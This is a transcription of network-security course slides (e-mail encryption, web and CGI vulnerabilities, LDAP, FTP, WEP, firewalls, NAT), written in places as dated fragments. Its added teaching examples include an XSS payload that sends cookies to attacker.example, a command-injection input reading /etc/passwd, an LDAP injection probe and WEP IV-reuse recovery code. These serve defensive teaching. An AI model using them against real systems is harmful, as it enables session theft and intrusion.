o RFC 2634: Enhanced Security Services for S/MIME
PKCS (Public Key Cryptography Standards)
S/MIME prevents exposure of signature information to an eavesdropper
o Applies the digital signature first, then encloses the signature and the original message in an encrypted digital envelope
X.509 Certificates
Rather than define its own certificate type (like PGP), S/MIME relies on X.509 Issued by a certificate authority (CA)
PGP versus S/MIME

Feature                               | PGP                                               | S/MIME
Public-key algorithm                  | ElGamal                                           | RSA
MIME encapsulation of signed data     | Choice of multipart/signed or signed data with ASCII armor | multipart/signed, CMS format
MIME encapsulation of encrypted data  | multipart/encrypted                               | application/pkcs7-mime
Trust model                           | Web of trust                                      | Hierarchical
Marketplace adoption                  | (not recoverable from the slide)                  | Growing quickly
Marketplace advocates                 | (not recoverable from the slide)                  | Microsoft, RSA, VeriSign
Ease of use                           | (not recoverable from the slide)                  | Configuration not intuitive; must obtain and install certificates; general use straightforward
E-mail Vulnerabilities
Spam
Act of flooding the Internet with many copies of the same message in an attempt to force the message on people who would not otherwise choose to receive it Unrequested junk mail
E-mail Spam
Targets individual users with direct mail messages
Creates lists by:
o Scanning Usenet postings
o Stealing Internet mailing lists
o Searching the Web for addresses
E-mail Hoaxes
Techniques used to spread them:
o Posing as an authority to exploit trust
o Generating excitement about being involved
o Creating a sense of importance/belonging
o Playing on people's gullibility/greed
Chapter Summary
PGP
o Current de facto e-mail encryption standard
o Basis of the OpenPGP standard
S/MIME
o Emerging standard in e-mail encryption
o Uses the X.509 certificates used by Microsoft and Netscape browser and e-mail client software
Web Security
Chapter 6
Learning Objectives
Understand the SSL/TLS protocols and their implementation on the Internet
Understand the HTTPS protocol as it relates to SSL
Explore common uses of instant messaging applications and identify vulnerabilities associated with those applications
Understand the vulnerabilities of JavaScript, buffer overflow, ActiveX, cookies, CGI, applets and SMTP relay, and how they are commonly exploited
SSL/TLS Protocol
Runs on top of TCP and below higher-level protocols
Uses TCP/IP on behalf of the higher-level protocols
Allows an SSL-enabled server to authenticate itself to an SSL-enabled client
Allows the client to authenticate itself to the server
Allows both machines to establish an encrypted connection
Uses ciphers to enable encryption of data between the two parties
Uses digital certificates to enable authentication of the parties involved in a secure transaction
Digital Certificates
Components
o Certificate user's name
o Entity for whom the certificate is being issued
o Public key of the subject
o Time stamp (validity period)
o An X.509 certificate also carries the issuer's name and the issuer's signature over all of the above, which is what lets the client check it
IM Security Issues
Cannot prevent transportation of files that contain viruses and Trojan horses
Misconfigured file sharing can provide access to sensitive or confidential data
Lack of encryption
Could be utilized for transportation of copyrighted material; potential for substantial legal consequences
Transferring files reveals the network addresses of hosts; could be used for a denial-of-service attack
IM Applications
Do not use well-known TCP ports for communication and file transfers; use registered ports Ports can be filtered to restrict certain functionalities or prevent usage altogether
Web Vulnerabilities
JavaScript
ActiveX
Buffers
Cookies
Signed applets
Common Gateway Interface (CGI)
Simple Mail Transfer Protocol (SMTP) relay
JavaScript
Scripting language developed by Netscape to enable Web authors to design interactive sites
Code is typically embedded in an HTML document (for example between the <head> and </head> tags)
Programs can perform tasks outside the user's control
ActiveX
Loosely defined set of technologies developed by Microsoft
o Outgrowth of OLE (Object Linking and Embedding) and COM (Component Object Model)
Provides tools for linking desktop applications to WWW content
ActiveX controls are native code (often written in Visual Basic or C++) that runs with the user's full privileges, so a malicious or buggy control can compromise the integrity, availability and confidentiality of the target system
Buffer
Temporary storage area, usually in RAM
Acts as a holding area, enabling the CPU to manipulate data before transferring it to a device
Buffer overflow: writing more data into a buffer than it was sized to hold overwrites adjacent memory, which an attacker can use to crash the program or redirect its execution
Cookies
Messages given to Web browsers by Web servers
o Browser stores the message in a text file
o Message is sent back to the server each time the browser requests a page from that server
Vulnerabilities of Cookies
Cookies can be stolen or manipulated to obtain information about users without their consent
Attacker convinces the user to follow a malicious hyperlink to the targeted server and obtains the cookie through the server's error-handling process (the server echoes the attacker's script back into the error page, where it runs with access to the site's cookies)
o User must be logged on during the time of the attack
Countermeasures
o Do not return unescaped data back to the user
o Do not echo 404 file requests back to the user
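The cookie-theft attack and the two countermeasures above, side by side, as an added example (not code from the slides). A 404 handler that echoes the requested path unescaped hands the attacker a script that runs in the victim's browser; the same handler with HTML escaping shows the text and runs nothing. The handler, the attacker's hostname and the cookie name are constructed for the example.

```python
"""Reflected cross-site scripting through an error page, beside the output escaping that stops it.

Added illustration, not code from the original slides. The 404 handler, the attacker's
hostname and the cookie name are constructed.
"""
import html

# A path the attacker puts in a link and tricks the victim into following. If the server
# echoes it raw, the script runs in the victim's browser with the site's cookies in scope.
PAYLOAD = '<script>new Image().src="http://attacker.example/c?"+document.cookie</script>'


def render_404_unsafe(requested_path: str) -> str:
    return f"<html><body><p>File not found: {requested_path}</p></body></html>"


def render_404_safe(requested_path: str) -> str:
    # html.escape turns <, >, &, " and ' into entities: the browser shows text, runs nothing.
    return f"<html><body><p>File not found: {html.escape(requested_path, quote=True)}</p></body></html>"


def contains_live_script(page: str) -> bool:
    """Crude check: is there an unescaped <script> tag anywhere in the response body?"""
    return "<script" in page.lower()


def session_cookie_header(value: str) -> str:
    """Second line of defence: HttpOnly keeps document.cookie from seeing the session cookie
    even if some other page does leak script; Secure keeps it off cleartext connections."""
    return f"Set-Cookie: session={value}; Path=/; HttpOnly; Secure"
```

Escaping at output time is the fix the slide asks for; the cookie attributes limit the damage when some other page gets it wrong.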
Java Applets
Internet applications (written in the Java programming language) that can operate on most client hardware and software platforms
Stored on Web servers, from where they are downloaded onto clients when first accessed
On subsequent access to the server, the applet is already cached on the client and can be executed with no download delay
Signed Applets
Technique of adding a digital signature to an applet to prove that it came unaltered from a particular trusted source
Signed applets can be given more privileges than ordinary applets
Unsigned applets are subject to sandbox restrictions
Unsigned Applets
Sandbox Model
Prevents the applet from:
o Performing operations on local system resources such as the file system
o Connecting to any Web site except the site from which the applet was loaded
o Accessing the client's local printer
o Accessing the client's system clipboard and properties
Signed Applets
CGI
Components
o Executable program on the server (the script itself)
o HTML page that feeds input to the executable
Interactive nature leads to security loopholes
o Allowing input from other systems to a program that runs on the local server exposes the system to potential security hazards
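The loophole above in its most common form, as an added example (not code from the slides): a CGI script that passes a form field into a shell command. The "finger" lookup is a classic CGI illustration; the attacker's input and the username allow-list are constructed for the example.

```python
"""Command injection through a CGI parameter, beside the validated, shell-free version.

Added illustration, not code from the original slides. The finger lookup, the attacker's
input and the allow-list pattern are constructed.
"""
import re
import subprocess

ATTACKER_INPUT = "alice; cat /etc/passwd"
USERNAME_RE = re.compile(r"[a-z_][a-z0-9_-]{0,31}")   # allow-list: what a login name may look like


def build_command_unsafe(user: str) -> str:
    """Interpolates raw input into a shell command line; ';' starts a second command."""
    return f"finger {user}"


def build_command_safe(user: str) -> list:
    """Reject anything outside the allow-list and return an argv list, never a shell string."""
    if not USERNAME_RE.fullmatch(user):
        raise ValueError(f"invalid username: {user!r}")
    return ["finger", user]


def shell_would_run_extra_command(cmdline: str) -> bool:
    """Does the string contain shell metacharacters that split or chain commands?"""
    return any(ch in cmdline for ch in ";|&`$\n")


def run_lookup(user: str) -> str:
    """How the CGI handler should invoke the tool: argv list, shell=False, bounded output."""
    argv = build_command_safe(user)
    result = subprocess.run(argv, capture_output=True, text=True, timeout=5, check=False)
    return result.stdout[:4096]
```

Both halves matter: the allow-list rejects input that is not a username at all, and passing an argv list with `shell=False` means that even a character the pattern missed is handed to `finger` as data rather than to a shell as syntax.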
SMTP Relay
Consequences of an open relay:
o Loss of bandwidth
o Hijacked mail servers that may no longer be able to serve their legitimate purpose
Chapter Summary
Protocols commonly implemented for secure message transmissions
o SSL/TLS
o Data encryption across the Internet through HTTPS (HTTP over SSL/TLS)
Instant Messaging
Learning Objectives
Explain the benefits offered by centralized enterprise directory services such as LDAP over traditional authentication systems
Identify the major vulnerabilities of the FTP method of exchanging data
Describe S/FTP, the major alternative to FTP, in order to better secure your network infrastructure
Illustrate the threat posed to your network by unmonitored file shares
Directory Services
Network services that uniquely identify users and can be used to authenticate and authorize them to use network resources
Allow users to look up username or resource information, just as DNS does
LDAP
Provides additional features including authentication and authorization
o Each person uses only one username and password regardless of client software and OS
Versatile directory system that is standards based and platform independent
LDAP Operations
LDAP Framework
Directory Information Tree (DIT)
Data structure that actually contains the directory information about network users and services
o Hierarchical structure
LDAP Framework
DN example (the components, most specific first)
o cn=Jonathan Q Public
o ou=Information Security Department
o o=XYZ Corp.
o c=United States
o Written as a single distinguished name: cn=Jonathan Q Public,ou=Information Security Department,o=XYZ Corp.,c=United States
Authorization
o Determines the network resources the user may access
o Determined by access control lists (ACLs)
Encryption
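Building the DN above from its components, and the related problem that the "one username for every application" design creates: each application now builds LDAP queries from user input, and a search filter assembled by string concatenation can be rewritten by that input. The following is an added example, not code from the slides: the escaping rules are those of RFC 4514 (DN values) and RFC 4515 (filter values); the login-filter shape and the attacker's username are constructed.

```python
"""Building LDAP distinguished names and search filters from user-supplied values safely.

Added illustration, not code from the original slides. Escaping follows RFC 4514 (DNs)
and RFC 4515 (filters); the login filter and the attacker input are constructed.
"""


def escape_dn_value(value: str) -> str:
    """RFC 4514: backslash-escape the characters that are special inside an RDN value."""
    out = value.replace("\\", "\\\\")
    for ch in ',+"<>;':
        out = out.replace(ch, "\\" + ch)
    if out.startswith(("#", " ")):
        out = "\\" + out
    if out.endswith(" "):
        out = out[:-1] + "\\ "
    return out


def build_dn(rdns) -> str:
    """Join (attribute, value) pairs, most specific first: cn=..., ou=..., o=..., c=..."""
    return ",".join(f"{attr}={escape_dn_value(val)}" for attr, val in rdns)


def escape_filter_value(value: str) -> str:
    """RFC 4515: inside a filter, backslash * ( ) and NUL become \\5c \\2a \\28 \\29 \\00."""
    return (value.replace("\\", "\\5c").replace("*", "\\2a").replace("(", "\\28")
                 .replace(")", "\\29").replace("\x00", "\\00"))


def login_filter_unsafe(username: str) -> str:
    """Concatenation: the user controls the structure of the filter, not just a value."""
    return f"(&(uid={username})(objectClass=person))"


def login_filter_safe(username: str) -> str:
    return f"(&(uid={escape_filter_value(username)})(objectClass=person))"


EXAMPLE_DN = build_dn([("cn", "Jonathan Q Public"),
                       ("ou", "Information Security Department"),
                       ("o", "XYZ Corp."),
                       ("c", "United States")])
ATTACKER_USERNAME = "*)(uid=*))(|(uid=*"   # classic filter-injection probe, constructed
```

With the unsafe builder the probe turns a lookup of one user into a filter that matches every person entry; with escaping the same string is just a (nonexistent) uid. Production code should use the escaping helpers of its LDAP library rather than hand-rolled ones, but the rules they implement are the ones shown here.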
Active FTP
FTP's default connection mode
The FTP server creates the data connection by opening a TCP session from its own source port 20 to a client port greater than 1023; the server initiating a connection back to the client is contrary to the usual client-to-server pattern and is what client-side firewalls tend to block
Passive FTP
Not supported by all FTP implementations
The client initiates the data connection to the server, with a source and destination port that are both random high ports; the server announces its port in the reply to the PASV command
FTP Countermeasures
Do not allow anonymous access unless a clear business requirement exists
Employ a state-of-the-art firewall
Ensure that the server has the latest security patches and has been properly configured to limit user access
Encrypt data before placing it on the FTP server
Encrypt the FTP data flow using a VPN connection
Switch to a secure alternative
S/FTP
Replacement for FTP that uses SSH version 2 as a secure framework for encrypting data transfers
File Sharing
Originally intended to share files on a LAN
Easy to set up
Uses the Windows graphical interface
Can be configured as peer-to-peer or as client/server shares
Chapter Summary
Key resources used to support mission-critical business applications
o Directory services
o LDAP
Learning Objectives
Understand security issues related to wireless data transfer
Understand the 802.11x standards
Understand the Wireless Application Protocol (WAP) and how it works
Understand the Wireless Transport Layer Security (WTLS) protocol and how it works
Understand Wired Equivalent Privacy (WEP) and how it works
Conduct a wireless site survey
Understand instant messaging
802.11
IEEE group responsible for defining the interface between wireless clients and their network access points in wireless LANs
First standard, finalized in 1997, defined three types of transmission at the Physical layer
o Diffused infrared: based on infrared transmissions
o Direct sequence spread spectrum (DSSS): radio based
o Frequency hopping spread spectrum (FHSS): radio based
Established WEP as an optional security protocol
Specified use of the 2.4 GHz industrial, scientific, and medical (ISM) radio band
Mandated a 1 Mbps data transfer rate and an optional 2 Mbps data transfer rate
Most prominent working groups: 802.11b, 802.11a, 802.11i, and 802.11g
802.11a
High-Speed Physical Layer in the 5 GHz Band
Sets specifications for wireless data transmission of up to 54 Mbps in the 5 GHz band
Uses an orthogonal frequency division multiplexing (OFDM) encoding scheme rather than FHSS or DSSS
Approved in 1999
802.11b
Higher-Speed Physical Layer Extension in the 2.4 GHz Band
Establishes specifications for data transmission at 11 Mbps (with fallback to 5.5, 2, and 1 Mbps) in the 2.4 GHz band
Sometimes referred to as Wi-Fi when associated with WECA-certified devices
Uses only DSSS
Approved in 1999
802.11c
Worked to establish MAC bridging functionality for 802.11 (operation in other countries is the remit of 802.11d, below)
Folded into the 802.1D standard for MAC bridging
802.11d
Responsible for determining the requirements necessary for 802.11 to operate in other countries
Continuing
802.11e
Responsible for creating a standard that will add multimedia and quality of service (QoS) capabilities to the wireless MAC layer and therefore guarantee specified data transmission rates and error percentages
Proposal in draft form
802.11f
Responsible for creating a standard that will allow for better roaming between multivendor access points and distribution systems
Ongoing
802.11g
Responsible for providing raw data throughput over wireless networks at a rate of 22 Mbps or more (the standard as finally approved in 2003 specifies up to 54 Mbps in the 2.4 GHz band)
Draft created in January 2002; final approval expected in late 2002 or early 2003
802.11h
Responsible for providing a way to allow for European implementation requests regarding the 5 GHz band
Requirements
o Limits a PC card from emitting more radio signal than needed
o Allows devices to listen to radio wave activity before picking a channel on which to broadcast
802.11i
Responsible for fixing the security flaws in WEP and 802.1x
Hopes to eliminate WEP altogether and replace it with Temporal Key Integrity Protocol (TKIP), which would require replacement of keys within a certain amount of time
Ongoing; not yet approved (as ratified in 2004, 802.11i keeps TKIP only as an interim measure for older hardware and specifies AES-CCMP as the long-term replacement)
802.11j
Worked to create a global standard in the 5 GHz band by making high-performance LAN (HiperLAN) and 802.11a interoperable Disbanded after efforts in this area were mostly successful
WAP-Enabled Devices
WTLS Authentication Classes
Class 1
o Anonymous; does not allow either the client or the gateway to authenticate the other
Class 2
o Only allows the client to authenticate the gateway
Class 3
o Allows both the client and the gateway to authenticate each other
Access Points
Connected to the wired LAN
Act as radio broadcast stations that transmit data to clients equipped with wireless network interface cards (NICs)
APs
NICs
WEPs Weaknesses
Problems related to the initialization vector (IV) that it uses to encrypt data and ensure its integrity
o The IV is only 24 bits long and is sent in the clear with every frame, so on a busy network IVs repeat within hours
o The RC4 keystream is a function of the IV plus the fixed shared key, so two frames with the same IV are encrypted with the same keystream, and the XOR of their ciphertexts equals the XOR of their plaintexts
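The IV-reuse weakness demonstrated end to end, as an added example (not code from the slides or from any WEP implementation): RC4 and the WEP framing (3-byte IV in the clear, RC4 keyed with IV || shared key) follow the standard, while the key, the IV value and the two frame payloads are constructed. WEP's CRC-32 integrity check value is left out because it plays no part in this attack.

```python
"""Why a reused WEP initialization vector breaks confidentiality without touching the key.

Added illustration, not code from the original slides. RC4 and the WEP framing follow
the standard; the key, IV and payloads are constructed. The CRC-32 ICV is omitted.
"""


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4: key scheduling, then keystream XOR. Encrypt and decrypt are the same call."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for b in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(b ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def wep_encrypt(shared_key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """WEP frame body: IV (3 bytes, sent in clear) || RC4(IV || shared key, plaintext)."""
    if len(iv) != 3:
        raise ValueError("WEP IV is 24 bits")
    return iv + rc4(iv + shared_key, plaintext)


def recover_from_iv_reuse(frame1: bytes, frame2: bytes, known_plaintext1: bytes) -> bytes:
    """Two frames under one IV share a keystream, so c1 XOR c2 = p1 XOR p2. Knowing p1
    (a predictable header, an ARP or DHCP body) yields p2 with no key recovery at all."""
    if frame1[:3] != frame2[:3]:
        raise ValueError("frames use different IVs; their keystreams differ")
    c1, c2 = frame1[3:], frame2[3:]
    n = min(len(c1), len(c2), len(known_plaintext1))
    return bytes(a ^ b ^ p for a, b, p in zip(c1[:n], c2[:n], known_plaintext1[:n]))
```

With 2^24 possible IVs a repeat is expected after roughly five thousand frames by the birthday bound, and many cards simply started at zero after a reset, so the attacker rarely has to wait. The lesson carries to any stream cipher: a nonce reused with the same key is a total loss of confidentiality for the frames involved.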
Definition of IM
Uses a real-time communication model
Allows users to keep track of the online status and availability of other users who are also using IM applications
Can be used on both wired and wireless devices
Easy and fast
Operates in two models:
Peer-to-peer model
o May cause the client to expose sensitive information
Peer-to-network model
o Risk of network outage and DoS attacks making IM communication unavailable
Problems Facing IM
Lack of default encryption enables packet sniffing Social engineering overcomes even encryption
Blocking IM
Install a firewall to block the ports that IM products use; IM will then be unavailable to all employees
Limited blocking not currently possible
Chapter Summary
Efforts of the IEEE, specifically the 802.11x standards, to standardize wireless security
Security issues related to dominant wireless protocols
o WAP: connects mobile telephones, PDAs, pocket computers, and other mobile devices to the Internet
o WEP: used in WLANs
o WTLS protocol
Conducting a site survey in advance of building a WLAN
Security threats related to using IM
Devices
Chapter 9
Learning Objectives
Understand the purpose of a network firewall and the kinds of firewall technology available on the market
Understand the role of routers, switches, and other networking hardware in security
Determine when VPN or RAS technology works to provide a secure network connection
Firewalls
Hardware or software device that provides a means of securing a computer or network from unwanted intrusion
o Dedicated physical device that protects network from intrusion
o Software feature added to a router, switch, or other device that prevents traffic to or from part of a network
Web servers
Mail servers
FTP servers
Databases
Intruders
o Sport hackers
o Malicious hackers
Enhances security by allowing the filter to distinguish on which side of the firewall a connection was initiated; essential to blocking IP spoofing attacks
Routers
Network management device that sits between network segments and routes traffic from one network to another
Allows networks to communicate with one another
Allows Internet to function
Acts as digital traffic cop (with addition of packet filtering)
Demilitarized Zone
Area set aside for servers that are publicly accessible or have lower security requirements
Sits between the Internet and the internal network's line of defense
o Stateful device fully protects other internal systems
o Packet filter allows external traffic only to services provided by DMZ servers
Allows a company to host its own Internet services without allowing unauthorized access to its private network
Bastion Hosts
Computers that reside in a DMZ and that host Web, mail, DNS, and/or FTP services
Gateway between an inside network and an outside network
Defends against attacks aimed at the inside network; used as a security measure
Unnecessary programs, services, and protocols are removed; unnecessary network ports are disabled
Do not share authentication services with trusted hosts within the network
Application Gateways
Also known as proxy servers
Monitor specific applications (FTP, HTTP, Telnet)
Allow packets accessing those services to go to only those computers that are allowed
Good backup to packet filtering
Security advantages
o Information hiding
o Robust authentication and logging
o Simpler filtering rules
Disadvantage
o Two steps are required to connect inbound or outbound traffic; can increase processor overhead
Layer 4
o Where TCP and UDP ports that control communication sessions operate
Layer 3
o Routes IP packets
Layer 2
o Delivers data frames across LANs
Switches
Provide same function as bridges (divide collision domains), but employ application-specific integrated circuits (ASICs) that are optimized for the task
Reduce collision domain to two nodes (switch and host)
o Main benefit over hubs
Switch Security
ACLs
Virtual Local Area Networks (VLANs)
Only authorized users can access the network
Data cannot be intercepted
Increases security from hackers
Reduces possibility of broadcast storm
Securing a Switch
Isolate all management interfaces
Manage switch by physical connection to a serial port or through secure shell (SSH) or other encrypted method
Use separate switches or hubs for DMZs to physically isolate them from the network and prevent VLAN jumping
Put switch behind dedicated firewall device
Maintain the switch; install latest version of software and security patches
Read product documentation
Set strong passwords
Wireless
Almost anyone can eavesdrop on a network communication
Encryption is the only secure method of communicating with wireless technology
Modems
Cable modem
o Connected to a shared segment; party line
o Most have basic firewall capabilities to prevent files from being viewed or downloaded
o Most implement the Data Over Cable Service Interface Specification (DOCSIS) for authentication and packet filtering
Dynamic IP addresses
Assigned by the Dynamic Host Configuration Protocol (DHCP)
Provide enhanced security
o By changing IP addresses of client machines, DHCP server makes them moving targets for potential hackers
IP-Based PBX
Software (computer-based IDS)
Dedicated hardware devices (network-based IDS)
Types of detection
o Anomaly-based detection
o Signature-based detection
Computer-based IDS
Software applications (agents) are installed on each protected computer
o Make use of disk space, RAM, and CPU time to analyze OS, applications, system audit trails
o Compare these to a list of specific rules
o Report discrepancies
Can be self-contained or remotely managed
Easy to upgrade software, but do not scale well
Network-based IDS
Monitors activity on a specific network segment
Dedicated platforms with two components
o Sensor: passively analyzes network traffic
o Management system: displays alarm information from the sensor
Anomaly-based Detection
Builds statistical profiles of user activity and then reacts to any activity that falls outside these profiles
Often leads to large number of false positives
o Users do not access computers/network in static, predictable ways
o Cost of building a sensor that could hold enough memory to contain the entire profile and time to process the profiles is prohibitively large
Signature-based Detection
Similar to antivirus program in its method of detecting potential attacks
Vendors produce a list of signatures used by the IDS to compare against activity on the network or host
When a match is found, the IDS takes some action (e.g., logging the event)
Can produce false positives; normal network activity may be construed as malicious
Norton Firewall
ZoneAlarm
Black Ice Defender
Tiny Software's Personal Firewall
Mobile Devices
Can open security holes for any computer with which these devices communicate
Chapter Summary
Virtual isolation of a computer or network by implementing a firewall through software and hardware techniques:
o Routers
o Switches
o Modems
o Various software packages designed to run on servers, workstations, and PDAs
Virtual private networks (VPNs)
Private branch exchanges (PBX)
Remote Access Services (RAS)
Learning Objectives
Identify and discuss the various types of transmission media
Explain how to physically protect transmission media adequately
Identify and discuss the various types of storage media
Know how to lessen the risk of catastrophic loss of information
Understand the various ways to encrypt data
Properly maintain or destroy stored data
Transmission Media
Coaxial cable
Twisted pair copper cable
o Shielded
o Unshielded
Coaxial Cable
Hollow outer cylinder surrounds a single inner wire conductor
More expensive than traditional telephone wiring
Less prone to interference
Typically carries larger amounts of data
Easily spliced; allows unauthorized users access to the network
Two types (not interchangeable)
o 50-ohm
o 75-ohm
Simple to implement and widely available
Low cost alternative that provides relatively high rates of data transmission
Disadvantages
o Can only carry data and voice
o Limited in distance it can transmit signals
10Base2 (ThinNet)
Uses a thin coaxial cable in an Ethernet environment
Capable of covering up to 180 meters
Allows daisy chaining
Not highly susceptible to noise interference
Transmits at 10 Mbps
Can support up to 30 nodes per segment
10Base5 (ThickNet)
Primarily used as a backbone in an office LAN environment
Often connects wiring closets
Can transmit data at speeds up to 10 Mbps
Covers distances up to 500 meters
Can accommodate up to 100 nodes per segment
Rigid and difficult to work with
Allows for data, voice, and video capabilities
Can cover greater distances and offers more bandwidth
Disadvantages
o Requires hardware to connect via modems
o More difficult to maintain
Twisted Pair
Connects to hardware using an RJ-45 connector
Fiber-Optic Cable
Glass core encased in plastic outer covering
Smaller, lighter, more fragile and susceptible to damage than coaxial or twisted pair cable
Carries light
Fiber-Optic Cable
Advantages
o Capable of transmitting more data much further than other wiring types
o Completely immune to effects of EMI
o Nearly impossible to splice without detection
Disadvantages
o Difficult to implement
o Expensive
o Fragile
o Small size
Summary: advantages vs. disadvantages
Very high bandwidth | Difficult to implement
EMI immunity | Expensive
Long distances | Fragile
High security | Small size
Unguided Transmission
Uses various technologies (microwave, radio and infrared) to receive and transmit through the air
Vulnerable to security breaches in which unauthorized users intercept data flow
Difficult to secure; unguided connections cannot be physically contained easily
Storage Media
Provides a way to hold data at rest
Hard disk drive
o Electromagnet inside disk drive rearranges the iron oxide particles into a series of patterns that represent 0s and 1s
Floppy Disk
3.5 inch, high density
1.44 MB capacity
Circular magnetic piece of plastic inside a rigid plastic case
Zip Disk
High-capacity floppy disk developed by Iomega Corporation
100 MB and 250 MB capacity
Relatively inexpensive and durable
Ideal for transporting larger multimedia files
Can be used for backup
Compact Disc
Data is recorded by creating very small bumps in the aluminum layer on long tiny tracks
Data is read by a laser beam, detected by an optoelectronic sensor, and the pattern translated into bits and sent to the computer
CD-ROMs
Most common type of CD
Material can be written or recorded to the disc only once
Hold prerecorded materials to be used on a computer (e.g., software, graphic images, short video clips, audio)
Write once, read many (WORM) type of media
Next step: compact disc-rewritable (CD-RW)
Tracks are thinner and closer to each other
Readable on both sides of the disc
Made out of plastic with a layer of gold, covered by a thin layer of clear polymer
Used to store full-length feature films
Used primarily in digital cameras, digital video cameras, digital audio recorders
CompactFlash Card
Stores up to 1 GB
High data transfer rate
Resistant to extreme weather conditions
SmartMedia Card
Used in digital still cameras, MP3 recorders, newer printing devices
Stores up to 64 MB of data
Less expensive than CompactFlash cards
High data transfer rate
Resistant to extreme weather conditions
Memory Stick
Holds up to 128 MB of data
Commonly used with digital still cameras, digital music players (MP3), digital voice recorders
High data transfer rate
Resistance to extreme temperatures
High storage capacity
Encryption
Implement a thorough encryption policy to guarantee that sensitive information does not fall into the wrong hands
Educate the entire organization about the importance of safeguarding sensitive data
Storing Media
Have a policy that tracks content and location of each disk
Mark each medium using a standardized naming scheme
Store copies in a secure location
Destruction of Media
Physically destroy the media
Erase the data
Chapter Summary
Transmission media
Storage media
Impact of different forms of transmission media and storage media on information security
Learning Objectives
Explain the network perimeter's importance to an organization's security policies
Identify place and role of the demilitarized zone in the network
Explain how network address translation is used to help secure networks
Spell out the role of tunneling in network security
Describe security features of virtual local area networks
Three-tiered Architecture
Outermost perimeter
Internal perimeters
Innermost perimeter
Outermost Perimeter
Router used to separate network from ISP's network
Identifies separation point between assets you control and those you do not
Most insecure area of a network infrastructure
Normally reserved for routers, firewalls, public Internet servers (HTTP, FTP, Gopher)
Not for sensitive company information that is for internal use only
Internal Perimeters
Represent additional boundaries where other security measures are in place
Network Classifications
Trusted
Semi-trusted
Untrusted
Trusted Networks
Inside network security perimeter
The networks you are trying to protect
Semi-Trusted Networks
Allow access to some database materials and email
May include DNS, proxy, and modem servers
Not for confidential or proprietary information
Referred to as the demilitarized zone (DMZ)
Untrusted Networks
Outside your security perimeter
Outside your control
DMZ
Used by a company to host its own Internet services without allowing unauthorized access to its private network
Sits between Internet and the internal network's line of defense, usually some combination of firewalls and bastion hosts
Traffic originating from it should be filtered
Typically contains devices accessible to Internet traffic
o Web (HTTP) servers
o FTP servers
o SMTP (e-mail) servers
o DNS servers
Optional, more secure approach to a simple firewall; may include a proxy server
Intranet
Either a network topology or application (usually a Web portal) used as a single point of access to deliver services to employees
Typically a collection of all LANs inside the firewall
Shares company information and computing resources among employees
Allows access to public Internet through firewalls that screen communications in both directions to maintain company security
Also called a campus network
Extranet
Private network that uses Internet protocol and public telecommunication system to provide various levels of accessibility to outsiders
Can be accessed only with a valid username and password
Identity determines which parts of the extranet you can view
Requires security and privacy
o Firewall management
o Issuance and use of digital certificates or other user authentication
o Encryption of messages
o Use of VPNs that tunnel through the public network
NAT
Most often used to map IPs from nonroutable private address spaces defined by RFC 1918
Static NAT and dynamic NAT
Port Address Translation (PAT)
o Variation of dynamic NAT
o Allows many hosts to share a single IP address by multiplexing streams differentiated by TCP/UDP port numbers
o Commonly implemented on SOHO routers
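An added example, not from the slides, of PAT as described above: a toy gateway that multiplexes RFC 1918 hosts behind one public address by port. Because its translation table records which side opened each flow, it also shows the stateful-filter point from the firewall slides (unsolicited inbound packets are dropped). The addresses and port range are constructed.

```python
"""Added example (not from the slides): a toy Port Address Translation (PAT)
gateway with a stateful translation table. All addresses are constructed."""
from dataclasses import dataclass
from ipaddress import ip_address, ip_network
from typing import Dict, Optional, Tuple

# Non-routable private address space defined by RFC 1918
RFC1918 = [ip_network("10.0.0.0/8"), ip_network("172.16.0.0/12"),
           ip_network("192.168.0.0/16")]


@dataclass(frozen=True)
class Packet:
    proto: str      # "tcp" or "udp"
    src_ip: str
    src_port: int
    dst_ip: str
    dst_port: int


def is_private(ip: str) -> bool:
    addr = ip_address(ip)
    return any(addr in net for net in RFC1918)


# Table entry: inside socket plus the outside peer that inside host contacted
Entry = Tuple[str, int, str, int]


class PatGateway:
    def __init__(self, public_ip: str, first_port: int = 40000):
        self.public_ip = public_ip
        self.next_port = first_port
        # (proto, inside ip, inside port, peer ip, peer port) -> public port
        self.by_flow: Dict[Tuple[str, str, int, str, int], int] = {}
        # (proto, public port) -> entry
        self.by_public_port: Dict[Tuple[str, int], Entry] = {}
        self.dropped = 0

    def translate_outbound(self, pkt: Packet) -> Optional[Packet]:
        """Inside -> outside. Many private hosts share the single public IP;
        each flow gets its own public port so replies can be told apart."""
        if not is_private(pkt.src_ip):
            return None  # only RFC 1918 sources are translated
        flow = (pkt.proto, pkt.src_ip, pkt.src_port, pkt.dst_ip, pkt.dst_port)
        if flow not in self.by_flow:
            port = self.next_port
            self.next_port += 1
            self.by_flow[flow] = port
            self.by_public_port[(pkt.proto, port)] = (
                pkt.src_ip, pkt.src_port, pkt.dst_ip, pkt.dst_port)
        return Packet(pkt.proto, self.public_ip, self.by_flow[flow],
                      pkt.dst_ip, pkt.dst_port)

    def translate_inbound(self, pkt: Packet) -> Optional[Packet]:
        """Outside -> inside. Only a reply to a flow an inside host opened,
        coming from the peer that host contacted, is translated back;
        anything else was initiated outside and is dropped."""
        entry = self.by_public_port.get((pkt.proto, pkt.dst_port))
        if (pkt.dst_ip != self.public_ip or entry is None
                or (pkt.src_ip, pkt.src_port) != (entry[2], entry[3])):
            self.dropped += 1
            return None
        inside_ip, inside_port, _, _ = entry
        return Packet(pkt.proto, pkt.src_ip, pkt.src_port,
                      inside_ip, inside_port)
```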
Tunneling
Enables a network to securely send its data through untrusted/shared network infrastructure
Encrypts and encapsulates a network protocol within packets carried by second network
Best-known example: virtual private networks
Replacing WAN links because of security and low cost
An option for most IP connectivity requirements
Example of a Tunnel
Benefits of VLANs
Network flexibility
Scalability
Increased performance
Some security features
Prevention: disable autonegotiation on all ports
Prevention: manually configure all trunk links with the VLANs that are permitted to traverse them
Chapter Summary
Technologies used to create network topologies that secure data and networked resources
o Perimeter networks
o Network address translation (NAT)
o Virtual local area networks (VLANs)
Intrusion Detection
Chapter 12
Learning Objectives
Explain what intrusion detection systems are and identify some major characteristics of intrusion detection products
Detail the differences between host-based and network-based intrusion detection
Identify active detection and passive detection features of both host- and network-based IDS products
Explain what honeypots are and how they are employed to increase network security
Clarify the role of security incident response teams in the organization
